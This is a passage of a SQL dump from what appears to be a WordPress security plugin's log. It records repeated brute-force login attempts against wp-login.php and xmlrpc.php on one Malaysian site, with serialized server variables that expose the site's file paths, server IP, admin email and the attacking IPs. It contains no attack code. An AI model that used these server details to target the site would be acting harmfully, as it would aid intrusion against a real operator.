05:48:50',17741152,19230496,'https://bintara.com.my/wp-login.php',1,0,'159.203.11.43'),(24418,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.11.43\";s:11:\"REMOTE_PORT\";s:5:\"34480\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBzxNVIJ66zPtjtaf0RXAAAAVY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568699332.9653\";s:12:\"REQUEST_TIME\";s:10:\"1568699332\";}}','notice','2019-09-17 05:48:54','2019-09-17 05:48:53',18257328,19555584,'https://bintara.com.my/xmlrpc.php',1,0,'159.203.11.43'),(24419,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"36016\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB0oA99C9j9bhK9KplJwQAAAQQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568699552.3514\";s:12:\"REQUEST_TIME\";s:10:\"1568699552\";}}','notice','2019-09-17 05:52:34','2019-09-17 05:52:33',17744240,19229768,'https://bintara.com.my/wp-login.php',1,0,'188.213.19.83'),(24420,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"36016\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB0oA99C9j9bhK9KplJwQAAAQQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568699552.3514\";s:12:\"REQUEST_TIME\";s:10:\"1568699552\";}}','notice','2019-09-17 05:52:35','2019-09-17 05:52:33',17905288,19229768,'https://bintara.com.my/wp-login.php',1,0,'188.213.19.83'),(24421,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"36800\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB0pNK-omY048@iBsMxSQAAANA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568699556.6052\";s:12:\"REQUEST_TIME\";s:10:\"1568699556\";}}','notice','2019-09-17 05:52:38','2019-09-17 05:52:37',18256064,19554656,'https://bintara.com.my/xmlrpc.php',1,0,'188.213.19.83'),(24422,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.146.140\";s:11:\"REMOTE_PORT\";s:5:\"49830\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB3cx@uZ4OC5N1Fn8FKiAAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568700275.3479\";s:12:\"REQUEST_TIME\";s:10:\"1568700275\";}}','notice','2019-09-17 06:04:36','2019-09-17 06:04:35',17740008,19230088,'https://bintara.com.my/wp-login.php',1,0,'142.44.146.140'),(24423,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.146.140\";s:11:\"REMOTE_PORT\";s:5:\"50740\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB3dtVIJ66zPtjtaf0VtgAAAU0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568700278.7184\";s:12:\"REQUEST_TIME\";s:10:\"1568700278\";}}','notice','2019-09-17 06:04:40','2019-09-17 06:04:39',18256168,19556128,'https://bintara.com.my/xmlrpc.php',1,0,'142.44.146.140'),(24424,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"53636\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB3fx@uZ4OC5N1Fn8FKiwAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568700287.5729\";s:12:\"REQUEST_TIME\";s:10:\"1568700287\";}}','notice','2019-09-17 06:04:49','2019-09-17 06:04:48',17742704,19234480,'https://bintara.com.my/wp-login.php',1,0,'148.72.211.251'),(24425,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"53970\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB3gh@uZ4OC5N1Fn8FKjAAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568700290.3705\";s:12:\"REQUEST_TIME\";s:10:\"1568700290\";}}','notice','2019-09-17 06:04:51','2019-09-17 06:04:50',18256168,19556128,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.211.251'),(24426,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"57774\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB61NVIJ66zPtjtaf0ZpwAAAUY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568701140.1499\";s:12:\"REQUEST_TIME\";s:10:\"1568701140\";}}','notice','2019-09-17 06:19:01','2019-09-17 